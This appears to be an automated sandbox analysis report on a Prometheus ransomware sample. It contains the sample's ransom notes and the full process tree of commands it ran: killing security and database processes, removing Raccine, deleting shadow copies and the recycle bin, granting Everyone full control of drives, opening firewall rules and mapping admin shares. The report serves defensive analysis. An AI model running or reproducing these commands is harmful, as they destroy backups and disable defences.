Resubmissions

13-08-2024 05:39

240813-gcg68swhqg 10

28-05-2021 06:53

210528-9sn3jdwaa2 10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    13-08-2024 05:39

General

  • Target

    e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe

  • Size

    290KB

  • MD5

    a6dcf23059f6e61fa683907c47baf73e

  • SHA1

    1d55396b26d97b18256513607dcbe3f308569d5b

  • SHA256

    e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3

  • SHA512

    72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7

  • SSDEEP

    6144:a7QOomfMNffeRQHO1l+E9eWGktbD3xEKHb6Em:aVomfwfahxND3xEKHbH

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: KvQGNEpYXs7pYI+Eu/95FmsXHPCzzuIQIunF3/BXQAXcDz+HBomGisx3+fbWMI7Kaa6qJgRgTOEmjOdsh04nLNMIuaLIzrOc/912cvprD2rzuIsTxGeJUW9d9ZfhIJHEt98YL86SyXnizs5DWrKXrRFzagv/VnewMBejIYiFvtvwJQITuJmhIn+ZEdw6gsIUGpiC7J3NAyYix/rNQ2HcOO6kk49ognIZ9mDFW2VTelFRnvohNdo9drH+b6E/QgPtWpEXarINlqIVBIih8jqhwusD4YKN1Kn8vQpTDX83ucK/oGS07HD8BMEBJ0yVJVPuN863c48wVWVsGvMzf2YvM8Fi1iGjq8p+OS3XsJuyI9nYuZUvjqhWsjMqJnLfroMqkhmBmsIzdVbvyWDt7TX2p+qzHnYFdAAeVFwdHXmGFOUpxcJ0dYzIiIXXbvuCUL5/aUbpI3baZiB9wXb4QybsGkcLGfHwh+wMgbAqRQsaBiVMMEw038oWiqnlb0nRXNMs8FcMZCpfX59Am+6kSrIq5rWh0oustCJ38FAPVvc/yUA3R6GfTZkqppRvKubHciDj3GVOPhL0lqePstf0k1qYYIwm22850GpGx6LXuVlTytAeoH8agidUSK7So73E7Imp9GVWuHd4F9j8/elZvICapco1wk6JhovRnn1IbWROnaw=
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: KvQGNEpYXs7pYI+Eu/95FmsXHPCzzuIQIunF3/BXQAXcDz+HBomGisx3+fbWMI7Kaa6qJgRgTOEmjOdsh04nLNMIuaLIzrOc/912cvprD2rzuIsTxGeJUW9d9ZfhIJHEt98YL86SyXnizs5DWrKXrRFzagv/VnewMBejIYiFvtvwJQITuJmhIn+ZEdw6gsIUGpiC7J3NAyYix/rNQ2HcOO6kk49ognIZ9mDFW2VTelFRnvohNdo9drH+b6E/QgPtWpEXarINlqIVBIih8jqhwusD4YKN1Kn8vQpTDX83ucK/oGS07HD8BMEBJ0yVJVPuN863c48wVWVsGvMzf2YvM8Fi1iGjq8p+OS3XsJuyI9nYuZUvjqhWsjMqJnLfroMqkhmBmsIzdVbvyWDt7TX2p+qzHnYFdAAeVFwdHXmGFOUpxcJ0dYzIiIXXbvuCUL5/aUbpI3baZiB9wXb4QybsGkcLGfHwh+wMgbAqRQsaBiVMMEw038oWiqnlb0nRXNMs8FcMZCpfX59Am+6kSrIq5rWh0oustCJ38FAPVvc/yUA3R6GfTZkqppRvKubHciDj3GVOPhL0lqePstf0k1qYYIwm22850GpGx6LXuVlTytAeoH8agidUSK7So73E7Imp9GVWuHd4F9j8/elZvICapco1wk6JhovRnn1IbWROnaw=
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Signatures

  • Disables service(s) 3 TTPs
  • Prometheus Ransomware

    Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.

  • Renames multiple (200) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 48 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
    "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"
    1⤵
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3056
    • C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2268
    • C:\Windows\system32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2732
      • C:\Windows\system32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:2808
      • C:\Windows\system32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:2844
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:2596
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c rd /s /q D:\\$Recycle.bin
            2⤵
              PID:2816
            • C:\Windows\system32\sc.exe
              "sc.exe" config Dnscache start= auto
              2⤵
              • Launches sc.exe
              PID:2768
            • C:\Windows\system32\sc.exe
              "sc.exe" config FDResPub start= auto
              2⤵
              • Launches sc.exe
              PID:2840
            • C:\Windows\system32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2612
            • C:\Windows\system32\sc.exe
              "sc.exe" config SSDPSRV start= auto
              2⤵
              • Launches sc.exe
              PID:2724
            • C:\Windows\system32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2700
            • C:\Windows\system32\sc.exe
              "sc.exe" config upnphost start= auto
              2⤵
              • Launches sc.exe
              PID:2664
            • C:\Windows\system32\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
              • Launches sc.exe
              PID:3024
            • C:\Windows\system32\sc.exe
              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
              2⤵
              • Launches sc.exe
              PID:2396
            • C:\Windows\system32\sc.exe
              "sc.exe" config SQLWriter start= disabled
              2⤵
              • Launches sc.exe
              PID:1940
            • C:\Windows\system32\sc.exe
              "sc.exe" config SstpSvc start= disabled
              2⤵
              • Launches sc.exe
              PID:2392
            • C:\Windows\system32\netsh.exe
              "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:1408
            • C:\Windows\system32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2032
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2404
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM firefoxconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1740
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM excel.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2556
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2848
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM agntsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2468
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM CNTAoSMgr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2460
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1584
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM thebat.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:952
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mysqld.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2856
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM sqlwriter.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:992
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM steam.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1272
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM sqbcoreservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1268
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM tbirdconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1664
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM encsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:644
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM dbeng50.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1968
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM thebat64.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" IM thunderbird.exe /F
              2⤵
              • Kills process with taskkill
              PID:2220
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM dbsnmp.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:328
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM isqlplussvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2516
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM ocomm.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1612
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM xfssvccon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2476
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM onenote.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1656
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM infopath.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2168
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2696
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM PccNTMon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2804
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM Ntrtscan.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3064
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mbamtray.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1676
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM msaccess.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2772
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM tmlisten.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3028
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM zoolz.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2396
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM outlook.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2392
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM msftesql.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2888
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2872
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM ocautoupds.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1712
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM powerpnt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2688
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM winword.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:600
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM ocssd.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1644
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2456
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mysqld-nt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1736
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM visio.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:344
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM oracle.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2016
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM wordpad.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:468
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM sqlservr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:332
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM mysqld-opt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1544
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM sqlagent.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1144
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM synctime.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2292
            • C:\Windows\system32\taskkill.exe
              "taskkill.exe" /IM sqlbrowser.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1492
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1928
            • C:\Windows\system32\icacls.exe
              "icacls" "C:*" /grant Everyone:F /T /C /Q
              2⤵
              • Modifies file permissions
              PID:1508
            • C:\Windows\system32\icacls.exe
              "icacls" "D:*" /grant Everyone:F /T /C /Q
              2⤵
              • Modifies file permissions
              PID:2316
            • C:\Windows\system32\icacls.exe
              "icacls" "Z:*" /grant Everyone:F /T /C /Q
              2⤵
              • Modifies file permissions
              PID:3036
            • C:\Windows\system32\net.exe
              "net.exe" use \\10.127.0.248\Users
              2⤵
                PID:2116
              • C:\Windows\system32\net.exe
                "net.exe" use \\10.127.0.248\A$
                2⤵
                  PID:576
                • C:\Windows\system32\net.exe
                  "net.exe" use \\10.127.0.248\B$
                  2⤵
                    PID:2256
                  • C:\Windows\system32\net.exe
                    "net.exe" use \\10.127.0.248\C$
                    2⤵
                      PID:820
                    • C:\Windows\system32\net.exe
                      "net.exe" use \\10.127.0.248\D$
                      2⤵
                        PID:2272
                      • C:\Windows\system32\net.exe
                        "net.exe" use \\10.127.0.248\E$
                        2⤵
                          PID:1988
                        • C:\Windows\system32\net.exe
                          "net.exe" use \\10.127.0.248\F$
                          2⤵
                            PID:556
                          • C:\Windows\system32\net.exe
                            "net.exe" use \\10.127.0.248\G$
                            2⤵
                              PID:2080
                            • C:\Windows\system32\net.exe
                              "net.exe" use \\10.127.0.248\J$
                              2⤵
                                PID:1696
                              • C:\Windows\system32\net.exe
                                "net.exe" use \\10.127.0.248\H$
                                2⤵
                                  PID:2164
                                • C:\Windows\system32\net.exe
                                  "net.exe" use \\10.127.0.248\K$
                                  2⤵
                                    PID:1540
                                  • C:\Windows\system32\net.exe
                                    "net.exe" use \\10.127.0.248\I$
                                    2⤵
                                      PID:2528
                                    • C:\Windows\system32\net.exe
                                      "net.exe" use \\10.127.0.248\L$
                                      2⤵
                                        PID:1808
                                      • C:\Windows\system32\net.exe
                                        "net.exe" use \\10.127.0.248\M$
                                        2⤵
                                          PID:2416
                                        • C:\Windows\system32\net.exe
                                          "net.exe" use \\10.127.0.248\P$
                                          2⤵
                                            PID:1500
                                          • C:\Windows\system32\net.exe
                                            "net.exe" use \\10.127.0.248\N$
                                            2⤵
                                              PID:2728
                                            • C:\Windows\system32\net.exe
                                              "net.exe" use \\10.127.0.248\Q$
                                              2⤵
                                                PID:1984
                                              • C:\Windows\system32\net.exe
                                                "net.exe" use \\10.127.0.248\O$
                                                2⤵
                                                  PID:1508
                                                • C:\Windows\system32\net.exe
                                                  "net.exe" use \\10.127.0.248\R$
                                                  2⤵
                                                    PID:2016
                                                  • C:\Windows\system32\net.exe
                                                    "net.exe" use \\10.127.0.248\S$
                                                    2⤵
                                                      PID:1712
                                                    • C:\Windows\system32\net.exe
                                                      "net.exe" use \\10.127.0.248\V$
                                                      2⤵
                                                        PID:1644
                                                      • C:\Windows\system32\net.exe
                                                        "net.exe" use \\10.127.0.248\T$
                                                        2⤵
                                                          PID:2948
                                                        • C:\Windows\system32\net.exe
                                                          "net.exe" use \\10.127.0.248\W$
                                                          2⤵
                                                            PID:2200
                                                          • C:\Windows\system32\net.exe
                                                            "net.exe" use \\10.127.0.248\U$
                                                            2⤵
                                                              PID:1588
                                                            • C:\Windows\system32\net.exe
                                                              "net.exe" use \\10.127.0.248\X$
                                                              2⤵
                                                                PID:1964
                                                              • C:\Windows\system32\net.exe
                                                                "net.exe" use \\10.127.0.248\Y$
                                                                2⤵
                                                                  PID:856
                                                                • C:\Windows\system32\net.exe
                                                                  "net.exe" use \\10.127.0.248\Z$
                                                                  2⤵
                                                                    PID:296
                                                                  • C:\Windows\System32\mshta.exe
                                                                    "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                                                    2⤵
                                                                    • Modifies Internet Explorer settings
                                                                    PID:1164
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                    2⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    PID:1968
                                                                    • C:\Windows\system32\PING.EXE
                                                                      ping 127.0.0.7 -n 3
                                                                      3⤵
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      • Runs ping.exe
                                                                      PID:2892
                                                                    • C:\Windows\system32\fsutil.exe
                                                                      fsutil file setZeroData offset=0 length=524288 “%s”
                                                                      3⤵
                                                                        PID:2964
                                                                    • C:\Windows\system32\arp.exe
                                                                      "arp" -a
                                                                      2⤵
                                                                      • Network Service Discovery
                                                                      PID:1320
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
                                                                      2⤵
                                                                      • Deletes itself
                                                                      PID:2212
                                                                      • C:\Windows\system32\choice.exe
                                                                        choice /C Y /N /D Y /T 3
                                                                        3⤵
                                                                          PID:2328

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

                                                                      Filesize

                                                                      21KB

                                                                      MD5

                                                                      9835ab4562d5cc431b31a78243b1f47d

                                                                      SHA1

                                                                      9055032bc4f4c4a738bb62315658cfeee03c5eb9

                                                                      SHA256

                                                                      8b5efd63f358557df9bead4c4bcd4d339635672643ef906c800c0ed95bb26c87

                                                                      SHA512

                                                                      08eeba9162f3ec2364f5a32b31f9b88570e6206ad33447e4052f6ae9961f21dd29eb17992e87c32b57201fca288f6918365d036fa75042aa99d00552892bcb52

                                                                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      aa2497f2df199d1d59dfe494f48d6029

                                                                      SHA1

                                                                      f07bbe471a7ba4acc1c68eab7c450097ff15238b

                                                                      SHA256

                                                                      ac73bc483327d5e982792b0d6776b8cdd32cb7b6be61d19c4d8c7c4e0e9f52c7

                                                                      SHA512

                                                                      3d9f15387e03374ce3607de9489d90917f0622f7228ca905b587f4440a31457fa4beba43d72313a4704c3cfa88b7731820b7e351c6841db572a80a1d8926a29e

                                                                    • memory/1164-797-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp

                                                                      Filesize

                                                                      64KB

                                                                    • memory/1928-8-0x0000000001E10000-0x0000000001E18000-memory.dmp

                                                                      Filesize

                                                                      32KB

                                                                    • memory/1928-7-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                                                      Filesize

                                                                      2.9MB

                                                                    • memory/3056-0-0x000007FEF5C03000-0x000007FEF5C04000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/3056-1-0x0000000000D50000-0x0000000000D9E000-memory.dmp

                                                                      Filesize

                                                                      312KB

                                                                    • memory/3056-2-0x000007FEF5C00000-0x000007FEF65EC000-memory.dmp

                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/3056-448-0x000007FEF5C03000-0x000007FEF5C04000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/3056-696-0x000007FEF5C00000-0x000007FEF65EC000-memory.dmp

                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/3056-799-0x000007FEF5C00000-0x000007FEF65EC000-memory.dmp

                                                                      Filesize

                                                                      9.9MB